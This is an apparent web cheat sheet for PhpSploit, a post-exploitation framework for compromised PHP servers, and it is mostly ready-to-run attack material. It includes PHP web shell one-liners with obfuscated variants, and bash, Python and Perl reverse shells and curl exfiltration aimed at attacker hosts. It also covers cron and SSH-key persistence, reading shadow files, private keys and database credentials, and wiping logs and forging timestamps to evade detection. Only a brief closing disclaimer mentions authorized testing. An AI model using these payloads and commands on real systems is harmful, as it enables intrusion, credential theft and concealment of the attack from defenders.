Pular para o conteúdo
1337skills 1337skills - Folhas de Dicas

PhpSploit

Overview

Seção intitulada “Overview”

PhpSploit is a remote administration framework designed for stealth post-exploitation activities on compromised PHP web servers. It operates through hidden PHP backdoors, allowing attackers to interact with compromised systems while evading detection. The framework provides command execution, file management, and system enumeration capabilities.

Key Features:

  • Stealth PHP backdoor deployment
  • Interactive remote shell environment
  • File upload, download, and manipulation
  • System enumeration and reconnaissance
  • Memory-based operation (minimal disk footprint)
  • Anti-detection capabilities
  • Multi-session management

Installation

Seção intitulada “Installation”

From GitHub

Seção intitulada “From GitHub”
git clone https://github.com/nil0x42/phpsploit.git
cd phpsploit
chmod +x phpsploit

Requirements

Seção intitulada “Requirements”
  • Python 3.6+
  • A web server with PHP execution capability
  • Target web server accessible

Verify Installation

Seção intitulada “Verify Installation”
./phpsploit --version
./phpsploit --help

Docker

Seção intitulada “Docker”
docker run -it --rm phpsploit

Basic Setup

Seção intitulada “Basic Setup”

Start PhpSploit Console

Seção intitulada “Start PhpSploit Console”
./phpsploit

Connect to Existing Backdoor

Seção intitulada “Connect to Existing Backdoor”
phpsploit> connect http://target.com/shell.php

Deploy New Backdoor

Seção intitulada “Deploy New Backdoor”
phpsploit> upload shell.php http://target.com/upload/

Interactive Shell

Seção intitulada “Interactive Shell”
phpsploit> shell

Core Commands

Seção intitulada “Core Commands”
CommandDescription
connectConnect to backdoor URL
uploadDeploy backdoor to server
downloadDownload file from server
shellInteractive command shell
runExecute system command
setConfigure framework settings
exploitRun exploitation modules
sessionsManage active sessions
helpDisplay command help
quitExit framework

Connection Management

Seção intitulada “Connection Management”

Connect to Backdoor

Seção intitulada “Connect to Backdoor”
phpsploit> connect http://target.com/index.php
phpsploit> connect http://target.com:8080/shell.php
phpsploit> connect http://target.com/admin/upload/shell.php

Connection with Proxy

Seção intitulada “Connection with Proxy”
phpsploit> set proxy http://127.0.0.1:8080
phpsploit> connect http://target.com/shell.php

Authentication

Seção intitulada “Authentication”
phpsploit> set user admin
phpsploit> set password secret123
phpsploit> connect http://target.com/shell.php

Session Management

Seção intitulada “Session Management”
phpsploit> sessions
phpsploit> sessions 1
phpsploit> sessions -k 1  # Kill session

Remote Command Execution

Seção intitulada “Remote Command Execution”

Execute Single Command

Seção intitulada “Execute Single Command”
phpsploit> run id
phpsploit> run whoami
phpsploit> run pwd
phpsploit> run uname -a

Interactive Shell Mode

Seção intitulada “Interactive Shell Mode”
phpsploit> shell
[shell]> id
[shell]> whoami
[shell]> ls -la
[shell]> exit

Execute Shell Scripts

Seção intitulada “Execute Shell Scripts”
phpsploit> run bash -c "for i in {1..10}; do echo $i; done"
phpsploit> run sh -c "cat /etc/passwd"
phpsploit> run perl -e 'print "Hello\n"'

Background Command Execution

Seção intitulada “Background Command Execution”
phpsploit> run nohup bash -i >& /dev/tcp/attacker.com/4444 0>&1 &

File Operations

Seção intitulada “File Operations”

Upload Files

Seção intitulada “Upload Files”
phpsploit> upload /path/to/local/file.txt /var/www/html/
phpsploit> upload shell.php /var/www/html/uploads/
phpsploit> upload /path/to/payload.elf /tmp/

Download Files

Seção intitulada “Download Files”
phpsploit> download /etc/passwd ./password_dump.txt
phpsploit> download /var/www/html/config.php ./config_backup.php
phpsploit> download /etc/shadow ./shadow_dump

List Remote Directory

Seção intitulada “List Remote Directory”
phpsploit> run ls -la /var/www/html/
phpsploit> run find /var/www/html -type f -name "*.php"
phpsploit> run du -sh /var/www/html/*

Create/Modify Files

Seção intitulada “Create/Modify Files”
phpsploit> run echo "<?php system(\$_GET['c']); ?>" > /var/www/html/shell.php
phpsploit> run cat > /tmp/malware.sh << EOF
# malware script here
EOF

System Enumeration

Seção intitulada “System Enumeration”

Get System Information

Seção intitulada “Get System Information”
phpsploit> run uname -a
phpsploit> run cat /etc/os-release
phpsploit> run hostnamectl
phpsploit> run whoami
phpsploit> run id

Network Information

Seção intitulada “Network Information”
phpsploit> run ip addr show
phpsploit> run ifconfig
phpsploit> run netstat -tulpn
phpsploit> run ss -tulpn

Process Enumeration

Seção intitulada “Process Enumeration”
phpsploit> run ps aux
phpsploit> run ps aux | grep -i apache
phpsploit> run ps aux | grep -i nginx

User and Privilege Information

Seção intitulada “User and Privilege Information”
phpsploit> run cat /etc/passwd
phpsploit> run sudo -l
phpsploit> run cat /etc/sudoers

Disk and Storage Information

Seção intitulada “Disk and Storage Information”
phpsploit> run df -h
phpsploit> run mount
phpsploit> run lsblk

Backdoor Deployment

Seção intitulada “Backdoor Deployment”

PHP Backdoor Creation

Seção intitulada “PHP Backdoor Creation”
# Simple one-liner backdoor
<?php system($_GET['cmd']); ?>

# More stealthy version
<?php if(isset($_POST['c'])){ echo "<pre>";system($_POST['c']);echo "</pre>"; } ?>

# Base64 encoded command execution
<?php system(base64_decode($_GET['x'])); ?>

Deploy Backdoor via PhpSploit

Seção intitulada “Deploy Backdoor via PhpSploit”
phpsploit> upload backdoor.php /var/www/html/
phpsploit> connect http://target.com/backdoor.php

Obfuscated Backdoor

Seção intitulada “Obfuscated Backdoor”
# Variable obfuscation
<?php $a="sy"."st"."em"; $a($_GET['c']); ?>

# Function indirection
<?php $f=create_function('$x','return system($x);'); echo $f($_GET['c']); ?>

Persistent Backdoor

Seção intitulada “Persistent Backdoor”
# Write to web root with persistence
phpsploit> run echo '<?php system($_GET["c"]); ?>' > /var/www/html/.hidden/shell.php
phpsploit> run chmod 644 /var/www/html/.hidden/shell.php

Post-Exploitation Workflows

Seção intitulada “Post-Exploitation Workflows”

Privilege Escalation Enumeration

Seção intitulada “Privilege Escalation Enumeration”
phpsploit> run sudo -l
phpsploit> run find / -perm -4000 2>/dev/null
phpsploit> run find / -writable 2>/dev/null | head -20
phpsploit> run cat /etc/crontab

Credential Harvesting

Seção intitulada “Credential Harvesting”
phpsploit> run cat /etc/shadow
phpsploit> run cat /home/*/.bash_history
phpsploit> run cat /root/.ssh/id_rsa

Lateral Movement

Seção intitulada “Lateral Movement”
# Enumerate internal network
phpsploit> run nmap -sn 192.168.1.0/24
phpsploit> run arp -a

# Scan for open ports
phpsploit> run netstat -tulpn | grep LISTEN

Data Exfiltration

Seção intitulada “Data Exfiltration”
# Tar and compress sensitive files
phpsploit> run tar -czf /tmp/data.tar.gz /var/www/html/

# Encode for exfiltration
phpsploit> run base64 /tmp/data.tar.gz > /tmp/data.b64

# Download exfiltrated data
phpsploit> download /tmp/data.b64 ./exfiltrated_data.b64

Advanced Configuration

Seção intitulada “Advanced Configuration”

Set User Agent

Seção intitulada “Set User Agent”
phpsploit> set user_agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
phpsploit> set user_agent "Custom-Agent/1.0"

Proxy Configuration

Seção intitulada “Proxy Configuration”
phpsploit> set proxy http://127.0.0.1:8080
phpsploit> set proxy socks5://127.0.0.1:9050

Timeout Settings

Seção intitulada “Timeout Settings”
phpsploit> set timeout 30
phpsploit> set connect_timeout 10

Request Headers

Seção intitulada “Request Headers”
phpsploit> set headers "Authorization: Bearer token123"
phpsploit> set headers "X-Custom-Header: value"

Verbosity and Logging

Seção intitulada “Verbosity and Logging”
phpsploit> set verbosity 3
phpsploit> set logging on
phpsploit> set log_file ./phpsploit.log

Exploitation Techniques

Seção intitulada “Exploitation Techniques”

Reverse Shell Deployment

Seção intitulada “Reverse Shell Deployment”
# Bash reverse shell
phpsploit> run bash -i >& /dev/tcp/10.10.10.10/4444 0>&1 &

# Python reverse shell
phpsploit> run python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.10.10',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(['/bin/sh','-i'])"

# Perl reverse shell
phpsploit> run perl -e "use Socket;$i='10.10.10.10';$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));connect(S,sockaddr_in($p,inet_aton($i)));exec('/bin/sh -i <&3 >&3 2>&3');"

Cron Job Persistence

Seção intitulada “Cron Job Persistence”
phpsploit> run crontab -l
phpsploit> run (crontab -l; echo "* * * * * /bin/bash -i >& /dev/tcp/10.10.10.10/4444 0>&1") | crontab -

SSH Key Injection

Seção intitulada “SSH Key Injection”
phpsploit> run mkdir -p /root/.ssh
phpsploit> run echo "ssh-rsa AAAA..." >> /root/.ssh/authorized_keys

Database Access

Seção intitulada “Database Access”
phpsploit> run mysql -u root -ppassword -e "SHOW DATABASES;"
phpsploit> run mysql -u root -ppassword wordpress -e "SELECT user_login, user_pass FROM wp_users;"

Defense Evasion

Seção intitulada “Defense Evasion”

Process Hiding

Seção intitulada “Process Hiding”
# Run command disassociated from parent
phpsploit> run nohup /path/to/command &
phpsploit> run setsid /path/to/command

Timestamp Manipulation

Seção intitulada “Timestamp Manipulation”
phpsploit> run touch -r /bin/ls /tmp/backdoor.php
phpsploit> run touch -t 202001010000 /tmp/backdoor.php

Log Sanitization

Seção intitulada “Log Sanitization”
phpsploit> run cat /var/log/apache2/access.log | grep -v "shell.php"
phpsploit> run > /var/log/apache2/access.log
phpsploit> run cat /dev/null > ~/.bash_history

Firewall Bypass

Seção intitulada “Firewall Bypass”
# DNS tunneling
phpsploit> run nslookup attacker.com

# HTTP tunneling
phpsploit> run curl http://attacker.com/callback?data=$(whoami)

Scripting and Automation

Seção intitulada “Scripting and Automation”

Create PhpSploit Script

Seção intitulada “Create PhpSploit Script”
#!/bin/bash
# automated_exploitation.sh

TARGET="http://target.com/shell.php"

phpsploit <<EOF
connect $TARGET
set verbosity 2
run id
run whoami
run pwd
run uname -a
download /etc/passwd ./passwd.txt
quit
EOF

Batch Command Execution

Seção intitulada “Batch Command Execution”
phpsploit> run 'for i in {1..10}; do echo $i; done'
phpsploit> run 'find / -name "*.conf" 2>/dev/null | head -20'
phpsploit> run 'grep -r "password" /var/www/html 2>/dev/null'

Real-World Attack Scenarios

Seção intitulada “Real-World Attack Scenarios”

Web Server Compromise

Seção intitulada “Web Server Compromise”
# 1. Upload backdoor
phpsploit> upload backdoor.php /var/www/html/

# 2. Connect to backdoor
phpsploit> connect http://target.com/backdoor.php

# 3. Enumerate system
phpsploit> run uname -a
phpsploit> run id

# 4. Create persistence
phpsploit> run echo "<?php system($_GET['c']); ?>" > /var/www/html/.htaccess.php

Database Extraction

Seção intitulada “Database Extraction”
# Identify database
phpsploit> run find / -name "*.env" | grep -i database

# Extract credentials
phpsploit> run cat /var/www/html/.env | grep DATABASE

# Dump database
phpsploit> run mysqldump -u root -p database > /tmp/dump.sql
phpsploit> download /tmp/dump.sql ./database_dump.sql

Application Server Escalation

Seção intitulada “Application Server Escalation”
# Identify running services
phpsploit> run ps aux | grep -i "apache\|nginx\|tomcat"

# Check for vulnerable services
phpsploit> run netstat -tulpn

# Attempt local privilege escalation
phpsploit> run sudo -l
phpsploit> run find / -perm -4000 2>/dev/null

Troubleshooting

Seção intitulada “Troubleshooting”

Connection Issues

Seção intitulada “Connection Issues”
# Verify backdoor accessibility
curl http://target.com/shell.php

# Test with different encoding
phpsploit> set encoding base64
phpsploit> connect http://target.com/shell.php

Command Execution Problems

Seção intitulada “Command Execution Problems”
# Test basic commands
phpsploit> run echo test
phpsploit> run id

# Check PHP version
phpsploit> run php --version

File Transfer Issues

Seção intitulada “File Transfer Issues”
# Verify file permissions
phpsploit> run ls -la /var/www/html/

# Check available space
phpsploit> run df -h /var/www/html/

Security Best Practices

Seção intitulada “Security Best Practices”

Operational Security

Seção intitulada “Operational Security”
  • Use VPN/proxy for all connections
  • Rotate backdoor locations regularly
  • Clean logs and evidence of activity
  • Use encrypted communication when possible
  • Establish dead drops for communication

Detection Avoidance

Seção intitulada “Detection Avoidance”
  • Use legitimate PHP functions
  • Avoid suspicious filenames
  • Minimize footprint on disk
  • Use appropriate timing for activities
  • Monitor system for detection indicators

Version and Support

Seção intitulada “Version and Support”
./phpsploit --version
Seção intitulada “Legal and Ethical Considerations”

Critical: PhpSploit is designed for authorized penetration testing and red team exercises only. Unauthorized access to computer systems is illegal. Always obtain explicit written authorization before deploying backdoors or conducting post-exploitation activities. Misuse of this framework may result in serious legal consequences.